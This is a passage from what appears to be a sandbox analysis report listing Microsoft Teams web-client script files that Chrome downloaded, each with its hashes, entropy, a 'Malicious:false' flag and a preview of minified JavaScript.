                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[981462],{981462:(e,t,i)=>{i.d(t,{v:()=>R});var n=i(203557),r=i(407845),o=i(405501),a=i(953760);const s={...i(965991).MX,PairwiseBrokerApplicationInitializeBrokering:"pairwiseBrokerApplicationInitializeBrokering",BrokerClientApplicationHandleBrokerHandshake:"brokerClientApplicationHandleBrokerHandshake",BrokerClientApplicationBrokeredSSOSilentRequest:"brokerClientApplicationBrokeredSSOSilentRequest",BrokerClientApplicationBrokeredSilentRequest:"brokerClientApplicationBrokeredSilentRequest",EmbeddedClientApplicationSendSSOSilentRequest:"embeddedSSOSilent",EmbeddedClientApplicationSendPopupRequest:"embeddedPopup",EmbeddedClientApplicationSendRedirectRequest:"embeddedRedirect",EmbeddedClientApplicationHandleRedirectRequest:"embeddedHandleRedirect",EmbeddedClientApplicationSendSilentRefreshRequest:"embeddedSilentRefresh"},l=new Map([[s.PairwiseBrokerApplicationInitializeBrokering,
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):3886746
                                                                                                                                                                                                                                                                            Entropy (8bit):5.391995387658667
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:49152:bFEqeRKTEJpWXa2Pyr7WrZ9s4SwwP2BIoortbDhqzAVNHI/Jwjka+O4jdTtk18p9:oVs1
                                                                                                                                                                                                                                                                            MD5:28623544BBB4E5FC02CD8DAFE548322F
                                                                                                                                                                                                                                                                            SHA1:8C8EB4A60C427BD5D0F60BF5EA4AD485D78B773E
                                                                                                                                                                                                                                                                            SHA-256:89416D1F024D76DD96F7ECDE58541D0F0B8B9382EE8E435AD64B42E89DD10666
                                                                                                                                                                                                                                                                            SHA-512:FDB5EBDA54583DC84EB4A5B7F980AD28FDAAA83F60FC96107BD9ACA7C754493E353A5BAA3C8A62B5BB7A0BE81BC51F12DF33DFD868D6A3507B94DB12E5C3366F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[805610],{211014:(e,t,n)=>{"use strict";n.d(t,{b:()=>i});const i=(0,n(965804).O)({isStudentAvatar:{Bf4jedk:"f1ohpo60"},isParentAvatar:{Bf4jedk:"ff9fk16"}})},516404:(e,t,n)=>{"use strict";function i(e){return'<link\n rel="shortcut icon"\n type="image/x-icon"\n id="teams-favicon"\n href="[[staticsPath]]/evergreen-assets/icons/microsoft_teams_logo_refresh.ico"\n/>','<link\n rel="shortcut icon"\n type="image/x-icon"\n id="teams-favicon"\n href="[[staticsPath]]/evergreen-assets/icons/microsoft_teams_logo_refresh.ico"\n/>'}n.d(t,{A:()=>i})},10247:(e,t,n)=>{"use strict";function i(e){var t="";Array.prototype.join;return t+="<style>\n .preload-title-bar-trim {\n ","mac"===e.osPlatform?t+="\n --preload-title-bar-background-color: rgb(98, 100, 167);\n ":t+="\n --preload-title-bar-background-color: rgb(70, 71, 117);\n ",t+='\n\n background-color: var(--preload-title-bar-bac
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):3452
                                                                                                                                                                                                                                                                            Entropy (8bit):5.117912766689607
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                                                                                                                                                                                            MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                                                                                                                                                                                            SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                                                                                                                                                                                            SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                                                                                                                                                                                            SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://login.live.com/Me.htm?v=3
                                                                                                                                                                                                                                                                            Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (20588)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):20703
                                                                                                                                                                                                                                                                            Entropy (8bit):5.264666815172731
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:xwzYpLlQ4N/aTLwZ8qgA604dlBoI8WcHFufkE+9zWP9+Gv0Y6XoDidUhs8L5skLx:CUVlQ4N/a3wZ8LA604bBoI8vcfN+9yPp
                                                                                                                                                                                                                                                                            MD5:69ECA731C1AAF4A9525E88C0A4F50F9D
                                                                                                                                                                                                                                                                            SHA1:B19B3D104E0BA17A8C9DB9804E68AA1E12583DA8
                                                                                                                                                                                                                                                                            SHA-256:5D6F5EFCC03C21420B1E057DA2C8F1307E88C17BA419DEB68CAC0C639208F031
                                                                                                                                                                                                                                                                            SHA-512:C1663BF699B799D65A419C99101CE4324B68F5FE103BE28F6CDD312D0AC5A65DC6F668423B2C227D9B49075AD63B96897E6D39AC847CD484258334EF159BCA98
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[945920],{145916:(t,e,i)=>{const r=i(710639),a=i(367323),{isPlainObject:n}=i(698286),s=i(944244),o=i(391318),{parse:l}=i(589059),d=["img","audio","video","picture","svg","object","map","iframe","embed"],c=["script","style"];function u(t,e){t&&Object.keys(t).forEach((function(i){e(t[i],i)}))}function f(t,e){return{}.hasOwnProperty.call(t,e)}function m(t,e){const i=[];return u(t,(function(t){e(t)&&i.push(t)})),i}t.exports=g,t.exports.default=g,Object.defineProperty(t.exports,"__esModule",{value:!0});const h=/^[^\0\t\n\f\r /<=>]+$/;function g(t,e,i){if(null==t)return"";let b="",w="";function y(t,e){const i=this;this.tag=t,this.attribs=e||{},this.tagPosition=b.length,this.text="",this.mediaChildren=[],this.updateParentNodeText=function(){if(H.length){H[H.length-1].text+=i.text}},this.updateParentNodeMediaChildren=function(){if(H.length&&d.includes(this.tag)){H[H.length-1].mediaChildren.push(th
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (64207)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):64315
                                                                                                                                                                                                                                                                            Entropy (8bit):5.843899859389002
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:mMFI/82Yes6+uUkL4hKKlOifhZ2M/FBl7GzoFY3T2S:RWBUkL4hTOif3pfl7fFYN
                                                                                                                                                                                                                                                                            MD5:FF77D9414B022CD2C1FC04445A615486
                                                                                                                                                                                                                                                                            SHA1:907876E4E342B9ED7629CEC7964669B8F17F5446
                                                                                                                                                                                                                                                                            SHA-256:279F0B1BBFDF404CBFADCBFA76104D2BC3C35DC3E863529A6CDA3340E00F33B6
                                                                                                                                                                                                                                                                            SHA-512:E05C0755BD3D245A8068B785C7B5F22D022BCF9B709DE5B8F579CF03E19AF0518EB85C5549EC0F75ADCCCE6781633749963703AC4869B596F98E0C607D52040A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/891386-7b9f6fb7e213dc9c.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[891386],{552211:(M,N,D)=>{"use strict";D.d(N,{x2:()=>i,ZI:()=>T,jC:()=>u,ri:()=>z,Xn:()=>c,xA:()=>e,O0:()=>t});var j=D(440320),I=D(848020);const i={...{"data-track-action-gesture":j.Od.click,"data-track-action-scenario-type":j.DB.appAuth,"data-track-module-type":j.nR.link,"data-track-panel-region":j.rP.main,"data-track-action-subworkload":j.i7.sisu,"data-track-action-workload":j.E0.auth,"data-track":!0},"data-track-action-outcome":j.nd.openInBrowser,"data-track-action-scenario":j.vB.authUseWorkAccountLink,"data-track-module-name":j.Sn.getTeamsForWorkOrSchool,"data-track-panel-type":j.HP.AuthAccountEnumerationMenu};function g(M){return{"data-track-action-gesture":j.Od.click,"data-track-action-scenario-type":j.DB.appAuth,"data-track-action-subworkload":j.i7.signout,"data-track-action-workload":j.E0.auth,"data-track-module-type":j.nR.button,"data-track-panel-region":j.rP.modal,"data-track-pa
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (41662)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):41778
                                                                                                                                                                                                                                                                            Entropy (8bit):5.360363617158387
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:gpYFYfTpWdL/In2MB1TU6EIQRNrPzaNfrfAxETtp27EFF9V9LfiTXIDLJqoGBwr:gpkYfId4D0ExYoFfiTXkFq7a
                                                                                                                                                                                                                                                                            MD5:38B448E73F0207EDB8A49DA72943D515
                                                                                                                                                                                                                                                                            SHA1:4B761C3BD552A524946DDEBEF41D392E4606EC14
                                                                                                                                                                                                                                                                            SHA-256:019D358A1E21F5B6F1FDE5482EEEF12051D85E374A48A35559108FC1FD3920F1
                                                                                                                                                                                                                                                                            SHA-512:2F5F3245B57FCAFC06A3CA95D068A60A28A94861A821B3E1DADC3EA6D3C134F0B6BF472B27683D01F66DB53BB921C3D6D318029D3865CC7E74808E254D028D2C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[204348],{941974:t=>{t.exports=function(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")},t.exports.__esModule=!0,t.exports.default=t.exports},749712:t=>{function e(t,e){for(var i=0;i<e.length;i++){var n=e[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(t,n.key,n)}}t.exports=function(t,i,n){return i&&e(t.prototype,i),n&&e(t,n),Object.defineProperty(t,"prototype",{writable:!1}),t},t.exports.__esModule=!0,t.exports.default=t.exports},238752:t=>{t.exports=function(t,e,i){return e in t?Object.defineProperty(t,e,{value:i,enumerable:!0,configurable:!0,writable:!0}):t[e]=i,t},t.exports.__esModule=!0,t.exports.default=t.exports},434192:(t,e,i)=>{var n=i(71012);t.exports=function(t,e){if(null==t)return{};var i,r,o=n(t,e);if(Object.getOwnPropertySymbols){var s=Object.getOwnPropertySymbols(t);for(r=0;r<s.length;r+
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (9167)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):9275
                                                                                                                                                                                                                                                                            Entropy (8bit):4.510710251595788
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:DAi0z2jGpS76h5H2VtCdYkVQTWh3+cjTnQ03SiVtB9jJj:N0z2jGpSq5H2VtCdYnlc/HSiVtvF
                                                                                                                                                                                                                                                                            MD5:2EB77E310EAEE79E0D7C1355B3BEFF5B
                                                                                                                                                                                                                                                                            SHA1:8B3A438962114E5815D13018AAA04000BA6EE69F
                                                                                                                                                                                                                                                                            SHA-256:957483AE90B62F6E44072EB51C20E693A5B6B57CC34D763AFA3EB42A658B9DFD
                                                                                                                                                                                                                                                                            SHA-512:98F3F4ADCA9FA49812B538747644A105C1AC1DFCF9FFD120BB7B5772FC6F0917B4FCD87C76FBFC8289DABE77385A62CD5E3F0B0E2E9902BD35E0F8DE163C72A9
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[698386],{698386:(a,l,Z)=>{Z.d(l,{aRN:()=>c,c8N:()=>v,WXH:()=>h,g0L:()=>H,NL$:()=>e,vrP:()=>m,vNW:()=>A,fEx:()=>V,faZ:()=>L,$8m:()=>i,N6m:()=>U,gMM:()=>o,k8t:()=>r,uJg:()=>u,lnn:()=>n,dAI:()=>g,Tv4:()=>t,$b4:()=>R,lDF:()=>d,OEH:()=>k,uwA:()=>s,CSI:()=>I,iCA:()=>C,IJL:()=>F,GOF:()=>f,ozV:()=>p});var M=Z(693935);const c=(0,M.U)("Info12Filled","12",["M11 6A5 5 0 1 1 1 6a5 5 0 0 1 10 0Zm-5.5.5V8a.5.5 0 0 0 1 0V6.5a.5.5 0 0 0-1 0ZM6 3.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"]),v=(0,M.U)("Info12Regular","12",["M5.5 6.5a.5.5 0 0 1 1 0V8a.5.5 0 0 1-1 0V6.5ZM6 3.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM1 6a5 5 0 1 1 10 0A5 5 0 0 1 1 6Zm5-4a4 4 0 1 0 0 8 4 4 0 0 0 0-8Z"]),h=(0,M.U)("Info16Filled","16",["M8 1a7 7 0 1 1 0 14A7 7 0 0 1 8 1Zm0 5.25a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm.5 1.25a.5.5 0 0 0-1 0v3a.5.5 0 0 0 1 0v-3Z"]),H=(0,M.U)("Info16Regular","16",["M8.5 7.5a.5.5 0 1 0-1 0v3
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):72
                                                                                                                                                                                                                                                                            Entropy (8bit):4.241202481433726
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                                                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                                                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                                                                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                                                                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):66345
                                                                                                                                                                                                                                                                            Entropy (8bit):5.485619117096751
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:vFrS8I/4l8zDs+bRpsN4MMWBGChqpH5ribuOmTQGixspnaolYREREMXEEpkOwP:9rS8uvDs+JCBGChb4Bvkd
                                                                                                                                                                                                                                                                            MD5:0627FA9B97C09D193BA9F177A9C1CACE
                                                                                                                                                                                                                                                                            SHA1:4BDEB937AB94D1928AB6E8E76FC57356F6D8DB87
                                                                                                                                                                                                                                                                            SHA-256:282893A0578FE44FB847158542789239861E2FD8AEE6661CFB4A5F85EF070136
                                                                                                                                                                                                                                                                            SHA-512:FA8708EB4A0304E34F61919902EE48A6682B5B00B4213920E4960EEB40ECF6818A17CE64AA74A978380E55F7E46D7BDA7D4FACDE9FC22454573AE62E4501304C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/9124-7837fcade4988613.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[9124,885903],{912278:(e,t,o)=>{o.d(t,{x:()=>r});var n=o(562341),r=function(e){return{attributes:{root:{role:"radio","aria-checked":e.active,disabled:e.disabled,"aria-disabled":e.disabledFocusable}},keyActions:(0,n.V)(e).keyActions}}},639034:(e,t,o)=>{o.d(t,{n:()=>g});var n=o(513432),r=o(644525),a=o(854130),s=o(2187);var i=o(589256),l=o(602835),c=o(164093),u=o(250452),d=o(796831);const f=(e,t)=>{const{openItems:o,defaultOpenItems:r,multiple:a=!1,collapsible:s=!1,onToggle:f,navigation:m}=e,[p,v]=(0,i.i)({state:n.useMemo((()=>function(e){if(void 0===e)return;return Array.isArray(e)?e:[e]}(o)),[o]),defaultState:r&&(()=>function({defaultOpenItems:e,multiple:t}){if(void 0!==e)return Array.isArray(e)?t?e:[e[0]]:[e];return[]}({defaultOpenItems:r,multiple:a})),initialState:[]}),g=(0,d.i)({circular:"circular"===m,tabbable:!0}),b=(0,l.D)((e=>{const t=function(e,t,o,n){if(!o)return t[0]=
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):98053
                                                                                                                                                                                                                                                                            Entropy (8bit):5.291610206119134
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:KJUrjVjLJ3PNHcDKxCxp9sv9RIVd/nvp8yV57sy7JcgSEZ:KJUrjVjLpPNH61r3HH75ygJ
                                                                                                                                                                                                                                                                            MD5:7DA6B8BD95515C63FFAE93208EF334CD
                                                                                                                                                                                                                                                                            SHA1:74FE0701E56B490B4596A4E31936E33ECCC4AB2D
                                                                                                                                                                                                                                                                            SHA-256:BE110624B15D21F194D898C8986C85EB9C28E4203370734293D22728E59D6EC2
                                                                                                                                                                                                                                                                            SHA-512:0DE5EB1B55F8B66CCBB405BE1B6288F720347F1BE1949379783F2C5957E135DB6F39BEB33E834B9A4C1C24A8E8175824A0564E60D92547A2994185589D4BDAEC
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/msteams/data-view-schema-f5c7116be1bd913f.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[610984],{514139:(e,t,n)=>{n.r(t),n.d(t,{ViewSchemaExecutor:()=>Po,createViewSchemaTerminatingLink:()=>Eo,viewSchemaPossibleTypes:()=>No.v});var a={};n.r(a),n.d(a,{node:()=>ce,views:()=>de});var i={};n.r(i),n.d(i,{Query:()=>a});var o={};n.r(o),n.d(o,{meControl:()=>pe});var r={};n.r(r),n.d(r,{accountLink:()=>xe,changePictureAriaLabel:()=>Le,changePictureTooltipText:()=>De,disableUPC:()=>ke,editNameButtonAriaLabel:()=>Oe,editNameButtonTooltipText:()=>Ie,hideAvatarUpdate:()=>Ue,hideNameEdit:()=>Be,id:()=>Pe,openUPCButtonAriaLabel:()=>Ne,openUPCButtonTooltipText:()=>Ee});var s={};n.r(s),n.d(s,{clearAfterCustomText:()=>He,clearAfterFourHrText:()=>Qe,clearAfterHalfHrText:()=>Re,clearAfterNeverText:()=>Ve,clearAfterOneHrText:()=>qe,clearAfterTodayText:()=>We,clearAfterTwoHrText:()=>Ge,clearAfterWeekText:()=>$e,id:()=>Fe});var l={};n.r(l),n.d(l,{hideSignOut:()=>je,id:()=>ze,menuListAr
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (14946)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):15054
                                                                                                                                                                                                                                                                            Entropy (8bit):5.152646782756875
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:soyB0m0WM9ymIOoNopcFBsVJbt6Bj4j5V2fMgweKxbAYUNmcz:ByB0VW9mIVipcvQDxEYUNF
                                                                                                                                                                                                                                                                            MD5:AB668D7FD64D6D724AACC13835600172
                                                                                                                                                                                                                                                                            SHA1:270F06034E2A78879F7266A6C0EEE7B0E3C9C638
                                                                                                                                                                                                                                                                            SHA-256:3640B1F9D4CE4975E2F7E4DE3FFA59BD73829A83258DC18DC0125B1DF281742F
                                                                                                                                                                                                                                                                            SHA-512:44B975C509BB412FBA65E54E9B346C09E4454E8986480DD28FAD992D8197801F64B30C625F6166AD2EB0C9E59FA89DA2BF30B1C7B6177DCBD8BC44449F880432
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/425104-7f05ec4bfb91b2a4.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[425104],{425104:(e,t,n)=>{n.d(t,{Zb:()=>F,Ag:()=>G,kD:()=>w,lg:()=>_,CK:()=>O});const i=Object.entries||function(e){return Object.keys(e).map((function(t){return[t,e[t]]}))};var s=n(305573),o=n(615582);function r(e,t){for(var n=Object.create(null),s=0,o=i(e);s<o.length;s++){var r=o[s],a=r[0],u=r[1];n[a]=t(u,a)}return n}function a(e){if(null===Object.getPrototypeOf(e))return e;for(var t=Object.create(null),n=0,s=i(e);n<s.length;n++){var o=s[n],r=o[0],a=o[1];t[r]=a}return t}var u=n(241921),c=n(625482),f=n(855752),p=5;var d=n(689054);function l(e){return e}var h=n(743357);var v=function(){function e(e){this._input=e,this._inputLowerCase=e.toLowerCase(),this._inputArray=y(this._inputLowerCase),this._rows=[new Array(e.length+1).fill(0),new Array(e.length+1).fill(0),new Array(e.length+1).fill(0)]}return e.prototype.measure=function(e,t){if(this._input===e)return 0;var n=e.toLowerCa
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (14104)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):14212
                                                                                                                                                                                                                                                                            Entropy (8bit):4.793888724643343
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:jjqz7w2M3hbxUTViE/G5qVQY61phMH3LDZiGhRpldoWOhq0QEQSTf9+P:j2AXhVUTViE/G5qVQYkpaBT/on8bSL9g
                                                                                                                                                                                                                                                                            MD5:C779A3CD7F261EFEA6776C15C84F5548
                                                                                                                                                                                                                                                                            SHA1:C330D22070332B3DAB44F90167FA26F32D5F56CF
                                                                                                                                                                                                                                                                            SHA-256:39B145AA7B80DB2B82502A5237A71CE7AD23F6A24F316819765CF6CAE41C4F97
                                                                                                                                                                                                                                                                            SHA-512:F9D89DBFBB56766357ED4374490AD7901022E54B9444376C492B38CA288824A5DD2273D38B01F12C7C8809E1C1F02E7F671888A674F761FF0668FFDEE038DC53
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[725591],{852774:(a,e,l)=>{l.d(e,{MHj:()=>c,nDI:()=>M,Vjr:()=>r,Fm4:()=>n,S61:()=>A,SH1:()=>s,W5L:()=>u,jz7:()=>t,lwq:()=>U,V$h:()=>i,qvE:()=>P,qXC:()=>L,_E3:()=>h,uO1:()=>v,yQ7:()=>m,gNt:()=>d,Vo$:()=>g,HkI:()=>R,jcT:()=>o,TTi:()=>f,NUA:()=>V,fGI:()=>H,B2S:()=>F,Ndk:()=>y,grK:()=>w,qSk:()=>b,DWd:()=>k,Z4e:()=>O,TNE:()=>C,mx_:()=>D,U$D:()=>S,gC_:()=>_,ORW:()=>B,vsS:()=>$,F$H:()=>p,xmy:()=>q,hmO:()=>x,X8c:()=>E,fPq:()=>I,dR_:()=>j,MxQ:()=>N,KCz:()=>Q,y3Y:()=>T,gNc:()=>z,uOK:()=>G,X0b:()=>K,PM$:()=>W,nPn:()=>X,lYg:()=>Y,omG:()=>J,xo$:()=>aa,$Oq:()=>ea,b8q:()=>la,ADj:()=>Za,tOz:()=>ca,Vvl:()=>Ma,w8$:()=>ra,$xG:()=>na,Uhh:()=>Aa,It2:()=>sa});var Z=l(693935);const c=(0,Z.U)("PersonVoice20Regular","20",["M17.13 1.06a.5.5 0 0 1 .68.2 9.96 9.96 0 0 1 0 9.48.5.5 0 1 1-.88-.48 8.96 8.96 0 0 0 0-8.52.5.5 0 0 1 .2-.68Zm-2.32 1.97a.5.5 0 0 1 .65.27 6.98 6.98 0 0 1 0 5.4.5.5 0 1 1-.92-.39 5
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (26378)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):26488
                                                                                                                                                                                                                                                                            Entropy (8bit):5.477905177072842
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:yxu3KtjQqUJDUvNt0qHSoDLRMg6xCY5LBzsuKtggY5d0gIBmA1WBnzYE04QuGwZi:rqJvsq7R6xCY5LBzsuKtuFeWBnqwWRP
                                                                                                                                                                                                                                                                            MD5:2F113745AB2B26A0E660243CFEF6817F
                                                                                                                                                                                                                                                                            SHA1:5D6A60ABF6FD688FF15919B9D7BD6B00BDE41ADA
                                                                                                                                                                                                                                                                            SHA-256:2C6CDF50F6FA5E859C7DF33DCD53B21EC5B6045E131E4F2A6FAE60255F5AD3AC
                                                                                                                                                                                                                                                                            SHA-512:23357C6A6422E6FA4EC9EE2737755A845A9FDB4F235D31A3473DAB0082CB2EFD0A633B1EE24340217ECEE182F5D341E24C7C1FFD53DF72A3AE82D59F786E8C20
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[400532],{170962:(e,t,n)=>{n.d(t,{d:()=>i,t:()=>u});var r=n(81984);const i={publicCommercialCloud:"teams.microsoft.com",gccHighCloud:"gov.teams.microsoft.us",dodCloud:"dod.teams.microsoft.us",dev:"local.teams.office.com",devLive:"local.teams.live.com",liveCloud:"teams.live.com",ag08Cloud:"https://teams.eaglex.ic.gov",ag09Cloud:"https://teams.microsoft.scloud"},o=/^(\s|\/)+|(\s|\/)+$/g,a={pathNamesLength:4,threadIDIndex:2,secondPathName:"meetup-join"},s={pathNamesLength:2,meetingIDIndex:1,firstPathName:"meet"};function l(e,t){return[i.dev,i.publicCommercialCloud].includes(t)?[i.devLive,i.liveCloud].includes(e):!![i.devLive,i.liveCloud].includes(t)&&[i.dev,i.publicCommercialCloud].includes(e)}function c(e){let t;try{t=new URL(e)}catch(e){return!1}const n=t.pathname.replace(o,"").split("/");return n.length===a.pathNamesLength&&n[1]===a.secondPathName&&!!n[a.threadIDIndex]||n.leng
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1321), with CRLF line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):1961
